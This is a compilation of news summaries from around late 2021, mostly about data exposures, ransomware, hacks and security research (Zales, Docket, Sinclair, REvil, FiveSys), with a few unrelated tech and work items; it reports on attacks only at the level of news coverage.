An anonymous reader quotes a report from KrebsOnSecurity: In December 2018, bling vendor Signet Jewelers fixed a weakness in their Kay Jewelers and Jared websites that exposed the order information for all of their online customers. This week, Signet subsidiary Zales.com updated its website to remediate a nearly identical customer data exposure. Last week, KrebsOnSecurity heard from a reader who was browsing Zales.com and suddenly found they were looking at someone else's order information on the website, including their name, billing address, shipping address, phone number, email address, items and total amount purchased, delivery date, tracking link, and the last four digits of the customer's credit card number. The reader noticed that the link for the order information she'd stumbled on included a lengthy numeric combination that -- when altered -- would produce yet another customer's order information. When the reader failed to get an immediate response from Signet, KrebsOnSecurity contacted the company.

In a written response, Signet said, "A concern was brought to our attention by an IT professional. We addressed it swiftly, and upon review we found no misuse or negative impact to any systems or customer data." Their statement continues: "As a business principle we make consumer information protection the highest priority, and proactively initiate independent and industry-leading security testing. As a result, we exceed industry benchmarks on data protection maturity. We always appreciate it when consumers reach out to us with feedback, and have committed to further our efforts on data protection maturity."

When Signet fixed similar weaknesses with its Jared and Kay websites back in 2018, the reader who found and reported that data exposure said his mind quickly turned to the various ways crooks might exploit access to customer order information. "My first thought was they could track a package of jewelry to someone's door and swipe it off their doorstep," said Brandon Sheehy, a Dallas-based Web developer. "My second thought was that someone could call Jared's customers and pretend to be Jared, reading the last four digits of the customer's card and saying there'd been a problem with the order, and if they could get a different card for the customer they could run it right away and get the order out quickly. That would be a pretty convincing scam. Or just targeted phishing attacks."

A security bug in the health app Docket exposed the private information of residents vaccinated against COVID-19 in New Jersey and Utah, where the app received endorsements from state officials. From a report: Docket lets residents download and carry a digital copy of their immunizations by pulling their vaccination records from their state's health authority. The digital copy has the same information as the COVID-19 paper card, but is digitally signed by the state to prevent forgeries. Docket is one of several so-called vaccine passports in the U.S., allowing residents to show their vaccination records -- or a scannable QR code -- for getting into events, restaurants or crossing into countries where vaccines are required.

But for a time, the app allowed anyone access to the QR codes of other vaccinated users -- and all the personal and vaccine information encoded within. That included names, dates of birth and information about a person's COVID-19 vaccination status, such as which type of vaccine they received and when. TechCrunch discovered the bug on Tuesday and immediately contacted the company. Docket chief executive Michael Perretta said the bug was fixed at the server level a few hours later. The bug was found in how the Docket app requests the user's QR code from its servers. The user's QR code is generated on the server in the form of a SMART Health Card, a widely accepted standard for validating a person's vaccination status across the world. That QR code is tied to a user ID, which isn't visible from the app, but can be viewed by looking at its network traffic using off-the-shelf software like Burp Suite or Charles Proxy.

Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began. NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. "There should be serious readiness in the field of cyberwar and related bodies should not allow the enemy to follow their ominous aims to make problem in trend of people's life," Raisi said. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.

On Wednesday morning, IRNA quoted another official who claimed 80% of Iran's gas stations had begun selling fuel again. Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack 64411." While ISNA didn't acknowledge the number's significance, that number is associated with a hotline run through Khamenei's office that handles questions about Islamic law. ISNA later removed its reports, claiming that it too had been hacked. Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy.

DeFi protocol Cream Finance suffered yet another hack this year after an exploit stole at least $130 million in what could be one of the largest thefts in decentralized finance. From a report: The attack on the Ethereum-based lending protocol was first reported by The Block Crypto, which cited a tweet by PeckShield highlighting a large flash-loan transaction that carried out the theft. The burgeoning DeFi landscape has drawn in billions of dollars in investor funds, but it has been a frequent target by hackers, with many using flash loans -- a type of uncollateralized lending -- as a way to exploit poorly protected protocols. Cream was involved in similar attacks that stole nearly $38 million in February and almost $19 million in August, according to The Block. Meanwhile, a hacker stole $600 million worth of crypto tokens from the PolyNetwork protocol in August in what is considered to be the largest DeFi hack ever.

The operators of the Grief ransomware have listed today the US National Rifle Association (NRA) as a victim of one of their attacks. From a report: The organization's name was listed on a dark web portal, often called a "leak site," where the Grief gang typically lists companies they infected and which haven't paid their ransom demands. It remains unclear if the Grief gang hit one of the NRA's smaller branches or if the attack hit the organization's central network. Ransomware gangs often like to exaggerate their attacks.

An anonymous reader quotes a report from KrebsOnSecurity: U.S. federal investigators today raided the Florida offices of PAX Technology, a Chinese provider of point-of-sale devices used by millions of businesses and retailers globally. KrebsOnSecurity has learned the raid is tied to reports that PAX's systems may have been involved in cyberattacks on U.S. and E.U. organizations. Headquartered in Shenzhen, China, PAX Technology Inc. has more than 60 million point-of-sale terminals in use throughout 120 countries. Earlier today, Jacksonville, Fla. based WOKV.com reported that agents with the FBI and Department of Homeland Security (DHS) had raided a local PAX Technology warehouse. In an official statement, investigators told WOKV only that they were executing a court-authorized search at the warehouse as a part of a federal investigation, and that the inquiry included the Department of Customs and Border Protection and the Naval Criminal Investigative Services (NCIS).

Several days ago, KrebsOnSecurity heard from a trusted source that the FBI began investigating PAX after a major U.S. payment processor started asking questions about unusual network packets originating from the company's payment terminals. According to that source, the payment processor found that the PAX terminals were being used both as a malware "dropper" -- a repository for malicious files -- and as "command-and-control" locations for staging attacks and collecting information. The source said two major financial providers -- one in the United States and one in the United Kingdom -- had already begun pulling PAX terminals from their payment infrastructure, a claim that was verified by two different sources. The source was unable to share specific details about the strange network activity that prompted the FBI's investigation. But it should be noted that point-of-sale terminals and the technology that supports them are perennial targets of cybercriminals.

An indie developer has found an interesting observation: Though only 5.8% of his game's buyers were playing on Linux, they generated over 38% of the bug reports. Not because the Linux platform was buggier, either. Only 3 of the roughly 400 bug reports submitted by Linux users were platform specific, that is, would only happen on Linux. PC Gamer reports: The developer, posting as Koderski for developer Kodera Software on Reddit, makes indie game [Delta] V: Rings of Saturn -- that's Delta V, or DV, for the non-rocket-science-literate. [...] Koderski says he's sold a little over 12,000 copies of his game, and about 700 of those were bought by Linux players. "I got 1040 bug reports in total, out of which roughly 400 are made by Linux players," says Koderski's post. "That's one report per 11.5 users on average, and one report per 1.75 Linux players. That's right, an average Linux player will get you 650% more bug reports." Koderski's numbers are a limited sample size drawn from one person's experience, but tell a compelling story.

Koderski also says that very few of those bugs were specific to Linux, being clear that "This 5.8% of players found 38% of all the bugs that affected everyone." The bug reports themselves were also pretty high quality, he said, including software and OS versions, logs, and steps for replication. Multiple commenters on the post chalked this up to the kind of people who use Linux: Software professionals, IT employees, and engineers who would already be familiar with official bug reporting processes. It's a strong theory as to why this might be, though the sheer passion that the gaming on Linux community has for anyone who supports their favorite hobby may be another.

Microsoft said on Monday that a Russian state-sponsored hacking group known as Nobelium had attacked more than 140 IT and cloud services providers, successfully breaching 14 companies. From a report: The Microsoft Threat Intelligence Center (MSTIC) said the attacks were part of a planned campaign that began in May this year. The attacks included spear-phishing campaigns and password-spraying operations that targeted employees of companies that manage IT and cloud infrastructure on behalf of their clients. "We believe Nobelium ultimately hopes to piggyback on any direct access that resellers may have to their customers' IT systems and more easily impersonate an organization's trusted technology partner to gain access to their downstream customers," said Tom Burt, Corporate Vice President for Customer Security & Trust at Microsoft.

It's estimated there are 10.9 million digital nomads just in the U.S. — and two digital nomads writing for The Next Web point out they're just part of a larger trend. "As of 2021, there are over 35 million digital nomads

Are they also about to start changing the world? Digital nomads' growing numbers and financial clout have caused dozens of tourist-starved countries to update their travel policies for borderless workers. In Summer 2020, a handful of nations launched visa programs to attract digital nomads, starting with Estonia in June, then Barbados, Bermuda, Costa Rica, Anguilla, Antigua, and later, most of Eastern Europe. Now, 30+ nations offer some form of incentive for traveling remote workers. Sweetheart deals like income tax breaks, subsidized housing, and free multiple entry have become as popular as employee work benefits. The opportunities are so numerous, solutions exist just to help you "amenity shop" the perfect country Airbnb style...

Some ambitious nomads, like activist and author Lauren Razavi, have also started to advocate for their rights as global citizens and the future of borderless work... Remote workers like Lauren (and us) want to completely redefine the role governments play in digital nomads' movement and regulation. How? By laying the foundation for the next generation of travel and work, an internet country called Plumia... Plumia wants to build the alternative using decentralized technologies, while also working with countries and institutions on policies that achieve common goals... Begun in 2020 as an independent project by remote-first travel insurance company, SafetyWing, Plumia's plan is to combine the infrastructure for living anywhere with the functions of a geographic country...

Blockchain enthusiasts are also testing an approach that begs the question: are traditional countries still necessary? Bitnation advocates for decentralizing authority by empowering voluntary participation and peer-to-peer agreements. They've âhosted the world's first blockchain marriage, birth certificate, refugee emergency ID, and more as proof of concept... Currently in development, Plumia is focusing on developing member-focused services and content... Verifying a digital identity, maintaining a 'permanent address' whilst on the move, switching service providers and jurisdictions on the fly, complying with complicated tax and labor laws — these are all thorny issues to solve. Initiatives like Plumia are jumping into quite an active ring, however.

In addition to countries competing to serve and attract digital nomads, a number of well-financed startups such as Jobbatical, Remote, and Oyster are creating private-sector solutions to issues posed by people and companies going remote.

Cybersecurity researchers at Bitdefender say cyber criminals have been using a rootkit named FiveSys "that somehow made its way through the driver certification process to be digitally signed by Microsoft," reports ZDNet: The valid signature enables the rootkit — malicious software that allows cyber criminals to access and control infected computers — to appear valid and bypass operating systems restrictions and gain what researchers describe as "virtually unlimited privileges". It's known for cyber criminals to use stolen digital certificates, but in this case, they've managed to acquire a valid one.

It's a still a mystery how cyber criminals were able to get hold of a valid certificate. "Chances is that it was submitted for validation and somehow it got through the checks. While the digital signing requirements detect and stop most of the rootkits, they are not foolproof," Bogdan Botezatu, director of threat research and reporting at Bitdefender told ZDNet. It's uncertain how FiveSys is actually distributed, but researchers believe that it's bundled with cracked software downloads.

Once installed, FiveSys rootkit redirects internet traffic to a proxy server, which it does by installing a custom root certificate so that the browser won't warn about the unknown identity of the proxy. This also blocks other malware from writing on the drivers, in what's likely an attempt to stop other cyber criminals from taking advantage of the compromised system. Analysis of attacks shows that FiveSys rootkit is being used in cyber attacks targeting online gamers, with the aim of stealing login credentials and the ability to hijack in-game purchases. The popularity of online games means that a lot of money can be involved — not only because banking details are connected to accounts, but also because prestigious virtual items can fetch large sums of money when sold, meaning attackers could exploit access to steal and sell these items.

Currently, the attacks are targeting gamers in China — which is where researchers also believe that the attackers are operating from.
"The campaign started slowly in late 2020, but massively expanded during the course of summer 2021," ZDNet adds.

"The campaign is now blocked after researchers at Bitdefender flagged the abuse of digital trust to Microsoft, which revoked the signature."

"Facebook has filed a lawsuit on Friday against a Ukrainian national for allegedly scraping its website and selling the personal data of more than 178 million users on an underground cybercrime forum," reports the Record. According to court documents filed Friday, the man was identified as Alexander Alexandrovich Solonchenko, a resident of Kirovograd, Ukraine. Facebook alleges that Solonchenko abused a feature part of the Facebook Messenger service called Contact Importer. The feature allowed users to synchronize their phone address books and see which contacts had a Facebook account in order to allow users to reach out to their friends via Facebook Messenger. Between January 2018 and September 2019, Facebook said that Solonchenko used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers. As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later collected and offered for sale on December 1, 2020, in a post on RaidForums, a notorious cybercrime forum and marketplace for stolen data.
The article also notes that Facebook's court documents say Solonchenko scraped data from some of the largest companies in the Ukraine, including its largest commercial bank and largest private delivery service.

And the Record points out that he's not the only person known to have this hole to scrape Facebook's user data and then sell it on the forum.) Days after another incident in April involving 533 leaked phone numbers of Facebook user, Facebook "revealed that it retired the Messenger Contact Importer feature back in September 2019 after it discovered Solonchenko and other threat actors abusing it."

An anonymous reader quotes a report from Motherboard: In the early hours of Sunday morning, hackers took down the corporate servers and systems of Sinclair Broadcast Group, a giant U.S. TV conglomerate that owns or operates more than 600 channels across the country. Days later, inside the company, "it's pandemonium and chaos," as one current employee, who asked to remain anonymous as they were not authorized to speak to the press, told Motherboard. Sinclair has released very few details about the attack since it was hacked Sunday. On Wednesday, Bloomberg reported that the group behind the attack is the infamous Evil Corp., a ransomware gang that is believed to be based in Russia and which was sanctioned by the U.S. Treasury department in 2019.

The ransomware attack interfered with several channels' broadcast programming, preventing them from airing ads or NFL games, as reported by The Record, a news site owned by cybersecurity firm Recorded Future. It has also left employees confused and wondering what's going on, according to current Sinclair workers. "Whoever did this, they either by accident or by design did a very good job," a current employee said in a phone call, explaining that there are some channels that haven't been able to air commercials since Sunday. "We're really running in the blind [...] you really can't do your job." The employee said that he was working on Sunday and was able to get two emails out to colleagues. "And one of them got it, and the other one didn't," they said.

Employees did not have access to their emails until Tuesday morning, according to the two employees and text messages seen by Motherboard. The office computers, however, are still locked by the company out of precaution, and Sinclair told employees not to log into their corporate VPN, which they usually used to do their jobs. Until Thursday, the company was communicating with employees via text, according to the sources, who shared some of the texts sent by the company. In one of them, they called for an all hands meeting. The meeting, according to the two current employees, was quick and vague. Both sources said that the company should be more transparent with its own employees.

An anonymous reader quotes a report from Motherboard: Bitcoin is on a tear, reaching an all time high price of $67,000 for 1 BTC on Wednesday, buoyed by a series of approvals for Bitcoin futures funds on the stock market. But on one major U.S. exchange, the price flash-crashed 87 percent to roughly $8,200 on Thursday due to a bug in a trading algorithm. The crash occurred during a massive sell-off on the Binance.US exchange that occurred around 7:42 a.m. ET, Bloomberg reported. Binance is the largest cryptocurrency exchange in the world, and its Binance.US exchange is meant to be compliant with U.S. regulations, although it is still banned in several states.

According to a Binance.US spokesperson, the crash was due to an issue with a trading algorithm being run by one "institutional trader," which may indicate an investment fund of some sort. "One of our institutional traders indicated to us that they had a bug in their trading algorithm, which appears to have caused the sell-off," Binance.US told Bloomberg. "We are continuing to look into the event, but understand from the trader that they have now fixed their bug and that the issue appears to have been resolved." It's entirely possible that some lucky traders were at the right place at the right time and managed to snap up some incredibly cheap BTC, but mostly it's yet another example of weirdness along the edges of the crypto ecosystem.

Intel has open-sourced ControlFlag , a tool that uses machine learning to detect problems in computer code -- ideally to reduce the time required to debug apps and software. From a report: In tests, the company's machine programming research team says that ControlFlag has found hundreds of defects in proprietary, "production-quality" software, demonstrating its usefulness. "Last year, ControlFlag identified a code anomaly in Client URL (cURL), a computer software project transferring data using various network protocols over one billion times a day," Intel principal AI scientist Justin Gottschlich wrote in a blog post on LinkedIn.

"Most recently, ControlFlag achieved state-of-the-art results by identifying hundreds of latent defects related to memory and potential system crash bugs in proprietary production-level software. In addition, ControlFlag found dozens of novel anomalies on several high-quality open-source software repositories." The demand for quality code draws an ever-growing number of aspiring programmers to the profession. After years of study, they learn to translate abstracts into concrete, executable programs -- but most spend the majority of their working hours not programming. A recent study found that the IT industry spent an estimated $2 trillion in 2020 in software development costs associated with debugging code, with an estimated 50% of IT budgets spent on debugging.

An anonymous reader shares a report from Reuters: The ransomware group REvil was itself hacked and forced offline this week by a multi-country operation, according to three private sector cyber experts working with the United States and one former official. Former partners and associates of the Russian-led criminal gang were responsible for a May cyberattack on the Colonial Pipeline that led to widespread gas shortages on the U.S. East Coast. REvil's direct victims include top meatpacker JBS. The crime group's "Happy Blog" website, which had been used to leak victim data and extort companies, is no longer available. Officials said the Colonial attack used encryption software called DarkSide, which was developed by REvil associates.

VMWare head of cybersecurity strategy Tom Kellermann said law enforcement and intelligence personnel stopped the group from victimizing additional companies. "The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups," said Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations. "REvil was top of the list." [...] U.S. government attempts to stop REvil, one of the worst of dozens of ransomware gangs that work with hackers to penetrate and paralyze companies around the world, accelerated after the group compromised U.S. software management company Kaseya in July. That breach opened access to hundreds of Kaseya's customers all at once, leading to numerous emergency cyber incident response calls. Following the attack on Kaseya, the FBI obtained a universal decryption key that allowed those infected via Kaseya to recover their files without paying a ransom. But law enforcement officials initially withheld the key for weeks as it quietly pursued REvil's staff, the FBI later acknowledged. According to three people familiar with the matter, law enforcement and intelligence cyber specialists were able to hack REvil's computer network infrastructure, obtaining control of at least some of their servers.

After websites that the hacker group used to conduct business went offline in July, the main spokesman for the group, who calls himself "Unknown," vanished from the internet. When gang member 0_neday and others restored those websites from a backup last month, he unknowingly restarted some internal systems that were already controlled by law enforcement. "The REvil ransomware gang restored the infrastructure from the backups under the assumption that they had not been compromised," said Oleg Skulkin, deputy head of the forensics lab at the Russian-led security company Group-IB. "Ironically, the gang's own favorite tactic of compromising the backups was turned against them." Reliable backups are one of the most important defenses against ransomware attacks, but they must be kept unconnected from the main networks or they too can be encrypted by extortionists such as REvil.

"Apparently a bug in GPSD, the daemon responsible for deriving time from the GPS system, is going to trigger on October 24, 2021, jumping the time back to March of 2002," writes Slashdot reader suutar. "There's a fix that's been committed since August, but of course not everything is up to date." ZDNet's Steven J. Vaughan-Nichols writes: This will be ugly. Or, as Stephen Williams, who uncovered the bug put it, "I have a feeling that there will be some 'interesting moments' in the early morning when a bunch of the world's stratum 1 NTP servers using GPSD take the long strange trip back to 2002." GPSD maintainer Gary E. Miller has acknowledged the problem, and a fix has been made to the code. To be exact, the fix is in August 2021's GPSD 3.23 release. So, what's the problem if the fix is already in?

Well, there are two problems. First, it won't be backported to previous releases. If you're still using an older version, you may be out of luck. Second, as Miller observed, not all distros "pick up GPSD updates or upstream their patches. [This] is a very sore spot with me." So, just because your operating system is up to date does not mean that it will have the necessary GPSD fix. Miller suggests that you check it and do it yourself: "I [am] gonna fall back on Greg K_H's dictum: All users must update."

Oh, wondering what the mysterious root cause of all this commotion GPS Week Rollover? It's a legacy GPS problem. The GPS signal GPS week number uses a 10-bit code with a maximum value of 1,023. This means every 19.7 years; the GPS week number rolls over to zero. Or, as Miller noted, "This code is a 1024 week time warp waiting to happen." So, check your systems now for this problem. And, if, like most of us, you're relying on someone upstream from you for the correct time, check with them to make sure they've taken care of this forthcoming trouble.

AMD and Microsoft have issued patches to address the slowdowns reported with Ryzen processors when Windows 11 launched. Engadget reports: The latest chipset driver (version 3.10.08.506) should take care of the UEFI CPPC2 issue, which in some cases didn't "preferentially schedule threads on a processor's fastest core," AMD said. That could have slowed down apps that are sensitive to CPU thread performance. AMD noted that the problem was likely more noticeable in more powerful processors with more than eight cores and 65W or higher Thermal Design Power (TDP).

Meanwhile, Microsoft is rolling out a software update tackling a bug that increased L3 cache latency. The issue impacted apps that need quick memory access, which in turn caused CPUs to slow down by up to 15 percent. The patch, Windows 11 update KB5006746, will be available starting today, but at the time of writing, a page containing instructions for installing it isn't yet live. You should be able to install it via Windows Update too.

Almost two years after a wave of complaints flooded Google's support forums about YouTube accounts getting hijacked even if users had two-factor authentication enabled, Google's security team has finally tracked down the root cause of these attacks. From a report: In a report published today, the Google Threat Analysis Group (TAG) attributed these incidents to "a group of hackers recruited in a Russian-speaking forum." TAG said the hackers operated by reaching out to victims via email with various types of business opportunities. YouTubers were typically lured with potential sponsorship deals. Victims were asked to install and test various applications and then publish a review. Apps typically used in these schemes involved antivirus software, VPN clients, music players, photo editors, PC optimizers, or online games.

But unbeknownst to the targets, the hackers hid malware inside the apps. Once the YouTube creators received and installed the demo app, the installer would drop malware on their devices, malware which would extract login credentials and authentication cookies from their browsers and send the stolen data to a remote server. The hackers would then use the authentication cookies to access a YouTuber's account -- bypassing the need to enter a two-factor authentication (2FA) token -- and move to change passwords and the account's recovery email and phone numbers. With the victims locked out of their accounts, the hackers would typically sell the hijacked YouTube channel on underground marketplaces for stolen identities.

Gov. Mike Parson escalated his war with the St. Louis Post-Dispatch on Wednesday when his political operation published a video doubling down on his attack against a reporter who informed the state that a state website revealed teacher Social Security numbers. From a report: The video is produced by Uniting Missouri, a political action committee created by Parson supporters to back his 2020 election campaign. The PAC continues to raise and spend large sums of money to promote Parson's political agenda. It operates without direct input from Parson on its activities.

"The St. Louis Post-Dispatch is purely playing politics," the ad states. "Exploiting personal information is a squalid excuse for journalism." The ad comes less than a week after Parson's widely criticized demand for an investigation and prosecution of the reporter who discovered the security flaw in a state website, along with "all those involved." Parson read a statement calling the reporter "a hacker" to reporters gathered outside his Missouri Capitol office last Thursday, then left without taking questions. John Hancock, chairman of Uniting Missouri, declined to discuss any specifics about the video.

Google today released Chrome v95, the latest version of its popular web browser and a version that contains several changes that will likely cause problems for a considerable part of its users. The problematic changes include: removing support for File Transfer Protocol (FTP) URLs -- ftp://
removing support for the Universal 2nd Factor (U2F) standard, used in old-generation security keys (Chrome will only support FIDO2/WebAuth security keys going forward)
adding file size limits for browser cookies
removing support for URLs with non-IPv4 hostnames ending in numbers, such as http://example.0.1

In addition to breaking changes, Chrome 95 also comes with a new UI component called the "Side Panel," which can be used to view the Chrome browser's Reading List and Bookmarks.

A weekend cyberattack against Sinclair Broadcast Group was linked to one of the most infamous Russian cybergangs, called Evil Corp, Bloomberg reports. From the report: The Sinclair hackers used malware called Macaw, a variant of ransomware known as WastedLocker. Both Macaw and WastedLocker were created by Evil Corp., according to the two people, who requested anonymity to discuss confidential matters. Evil Corp. was sanctioned by the U.S. Treasury Department in 2019. Since then, it has been accused by cybersecurity experts of rebranding in an attempt to avoid the sanctions. People in the U.S. are generally prohibited from engaging in transactions with sanctioned entities, including paying a ransom. "Sinclair appears to have been hit by Macaw ransomware, a relatively new strain first reported in early October," said Allan Liska, a senior threat analyst at the cybersecurity firm Recorded Future Inc. "There have not been any other Macaw victims publicly reported."

An anonymous reader quotes a report from Engadget: Under Acting Chairwoman Jessica Rosenworcel, the Federal Communications Commission is seeking to create new rules targeting spam text messages. Like another recent proposed rulemaking from the agency, the policy would push wireless carriers and telephone companies to block the spam before it ever gets to your phone.

"We've seen a rise in scammers trying to take advantage of our trust of text messages by sending bogus robotexts that try to trick consumers to share sensitive information or click on malicious links," Rosenworcel said. "It's time we take steps to confront this latest wave of fraud and identify how mobile carriers can block these automated messages before they have the opportunity to cause any harm."

Akamai researchers have analyzed 10,000 JavaScript samples including malware droppers, phishing pages, scamming tools, Magecart snippets, cryptominers, etc. At least 26% of them use some form of obfuscation to evade detection, indicating an uptick in the adoption of this basic yet effective technique. BleepingComputer reports: Obfuscation is when easy-to-understand source code is converted into a hard to understand and confusing code that still operates as intended. Threat actors commonly use obfuscation to make it harder to analyze malicious scripts and to bypass security software. Obfuscation can be achieved through various means like the injection of unused code into a script, the splitting and concatenating of the code (breaking it into unconnected chunks), or the use of hexadecimal patterns and tricky overlaps with function and variable naming.

But not all obfuscation is malicious or tricky. As the report explains, about 0.5% of the 20,000 top-ranking websites on the web (according to Alexa), also use obfuscation techniques. As such, detecting malicious code based on the fact that is obfuscated isn't enough on its own, and further correlation with malicious functionality needs to be made. This mixing with legitimate deployment is precisely what makes the detection of risky code challenging, and the reason why obfuscation is becoming so widespread in the threat landscape.

A hacker has breached the Argentinian government's IT network and stolen ID card details for the country's entire population, data that is now being sold in private circles. The hack, which took place last month, targeted RENAPER, which stands for Registro Nacional de las Personas, translated as National Registry of Persons. From a report: The agency is a crucial cog inside the Argentinian Interior Ministry, where it is tasked with issuing national ID cards to all citizens, data that it also stores in digital format as a database accessible to other government agencies, acting as a backbone for most government queries for citizen's personal information.

An anonymous reader quotes a report from BleepingComputer: Researchers have proven it's possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands. The attack requires the setting up of a replica of the target ATM because training the algorithm for the specific dimensions and key spacing of the different PIN pads is crucially important. Next, the machine-learning model is trained to recognize pad presses and assign specific probabilities on a set of guesses, using video of people typing PINs on the ATM pad.

For the experiment, the researchers collected 5,800 videos of 58 different people of diverse demographics, entering 4-digit and 5-digit PINs. The machine that ran the prediction model was a Xeon E5-2670 with 128 GB of RAM and three Tesla K20m with 5GB of RAM each. By using three tries, which is typically the maximum allowed number of attempts before the card is withheld, the researchers reconstructed the correct sequence for 5-digit PINs 30% of the time, and reached 41% for 4-digit PINs. The model can exclude keys based on the non-typing hand coverage, and deduces the pressed digits from the movements of the other hand by evaluating the topological distance between two keys. The placement of the camera which captures the tries plays a key role, especially if recording left or right-handed individuals. Concealing a pinhole camera at the top of the ATM was determined to be the best approach for the attacker. If the camera is capable of capturing audio too, the model could also use pressing sound feedback which is slightly different for each digit, thus making the predictions a lot more accurate.

The financial crimes investigation unit of the US Treasury Department, also known as FinCEN, said last week it identified approximately $5.2 billion in outgoing Bitcoin transactions potentially tied to ransomware payments. From a report: FinCEN officials said the figure was compiled by analyzing 2,184 Suspicious Activity Reports (SARs) filed by US financial institutions over the last decade, between January 1, 2011, and June 30, 2021. While the initial SAR reports highlighted $1.56 billion in suspicious activity, a subsequent FinCEN investigation of the Top 10 most common ransomware variants exposed additional transactions, amounting to around $5.2 billion just from these groups alone.

TV broadcasts for Sinclair-owned channels went down Sunday across the US in what the stations have described as technical issues, but which multiple sources told The Record to be a ransomware attack. From the report: The incident occurred in the early hours of the day and took down the Sinclair internal corporate network, email servers, phone services, and the broadcasting systems of local TV stations. As a result of the attack, many channels weren't able to broadcast morning shows, news segments, and scheduled NFL games, according to a barrage of tweets coming from viewers and the TV channels themselves. "Internally, it's bad," a source who had to call Sinclair employees on their personal numbers to get more details about the attack, told The Record earlier today in a private conversation.

"As the United States seeks to shore up its defenses against cyberattacks, the country is seeking to harness the skills of some of the country's most promising young minds," reports the Washington Post, "using a model that mirrors competitive video gaming, also known as esports."

Though it's a partnership between the federal government, academia and the private sector, it's being run by Katzcy, a northern Virginia-based digital marketing firm, the Post reports: U.S. Cyber Games, a project founded in April and funded by the National Institute of Standards and Technology's National Initiative for Cybersecurity Education, has assembled a team of 25 Americans, ages 18 to 26, who will compete against other countries in the inaugural International Cybersecurity Challenge, scheduled to be held in Greece in June 2022.

The cyber games consist of two broad formats, with the competitions organized and promoted to appeal to a generation raised on video gaming. The goal is to identify and train candidates for careers in cybersecurity. There are king-of-the-hill-type games where one team tries to break into a network while the other team tries to defend it. There are also capture-the-flag-type games where teams must complete a series of puzzles that follow the basic tenets of cybersecurity programs, like decrypting an encrypted file or analyzing secret network traffic...

The U.S. cyber team's head coach, retired Lt. Col. TJ O'Connor who served as a communications support officer with special forces, noted the unique platform presented by cybersecurity competitions. Unlike other forms of computer science education, O'Connor said, staying up to date on the latest developments in cybersecurity is difficult, with hackers constantly iterating on and developing new tactics to break through cyberdefenses. "Understanding the most likely attack is one thing you gain through Cyber Games. It's an attack-based curriculum, and then you can plan the most appropriate strategies when they occur," said O'Connor, who helped create and now chairs Florida Tech's cybersecurity program.

A 2014 breach at Twitch "was so bad that Twitch essentially had to rebuild much of its code infrastructure because the company eventually decided to assume most of its servers were compromised," reports Vice. "They figured it would be easier to just label them 'dirty,' and slowly migrate them to new servers, according to three former employees who saw and worked with these servers."

Slashdot reader em1ly shares Vice's report (which Vice based on interviews with seven former Twitch employees who'd worked there when the breach happened): The discovery of the suspicious logs kicked off an intense investigation that pulled nearly all Twitch employees on deck. One former employee said they worked 20 hours a day for two months, another said he worked "three weeks straight." Other employees said they worked long hours for weeks on end; some who lived far from the office slept in hotel rooms booked by the company. At the time, Twitch had few, if any, dedicated cybersecurity engineers, so developers and engineers from other teams were pulled into the effort, working together in meeting rooms with glass windows covered, frantically trying to figure out just how bad the hack was, according to five former Twitch employees who were at the company at the time...

Twitch's users would only find out about the breach six months after its discovery, on March 23, 2015, when the company published a short blog post that explained "there may have been unauthorized access to some Twitch user account information," but did not let on nearly how damaging the hack was to Twitch internally.... When Twitch finally disclosed the hack in March of 2015, security engineers at Twitch and Amazon, who had come to help with the incident response, concluded that the hack had started at least eight months before the discovery in October of 2014, though they had no idea if the hackers had actually broken in even earlier than that, according to the former employee. "That was long enough for them to learn entirely how our whole system worked and the attacks they launched demonstrated that knowledge," the former employee said...

For months after the discovery and public announcement, several servers and services were internally labeled as "dirty," as a way to tell all developers and engineers to be careful when interacting with them, and to make sure they'd get cleaned up eventually. This meant that they were still live and in use, but engineers had put restrictions on them in the event that they were still compromised, according to three former employees. "The plan apparently was just to rebuild the entire infra[structure] from known-good code and deprecate the old 'dirty' environment. We still, years later, had a split between 'dirty' services (servers or other things that were running when the hack took place) and 'clean' services, which were fired up after," one of the former employees said. "We celebrated office-wide the day we took down the last dirty service!"
Another former employees tells Vice that the breach came as a surprise, even though the company hadn't invested in keeping itself secure. "Security efforts kept getting cancelled or deprioritized with the argument that 'everyone loves Twitch; no one wants to hack us.'" The Twitch engineer who'd first stumbled onto the breach described his reaction to Vice. " 'Oh fuck.' But I remember thinking that there was so much 'I told you so' here."

One former employee added later that a more recent incident just this month "demonstrates that they didn't learn anything from the incident in 2014." But not everyone agrees. Other former employees, however, said that the damage of this new data breach appears to be less severe than the 2014 hack. And that it's likely thanks to Twitch taking security more seriously since then.

Bloomberg reports: Even as the Covid-19 pandemic forced companies around the world to reimagine the workplace, researchers in Iceland were already conducting two trials of a shorter work week that involved about 2,500 workers — more than 1% of the country's working population. They found that the experiment was an "overwhelming success" — workers were able to work less, get paid the same, while maintaining productivity and improving personal well-being.

The Iceland research has been one of the few large, formal studies on the subject...

[Workers] were helped by their organizations which took concerted steps like introducing formal training programs on time-management to teach them how to reduce their hours while maintaining productivity. The trials also worked because both employees and employers were flexible, willing to experiment and make changes when something didn't work. In some cases, employers had to add a few hours back after cutting them too much...

Participants in the Iceland study reduced their hours by three to five hours per week without losing pay.

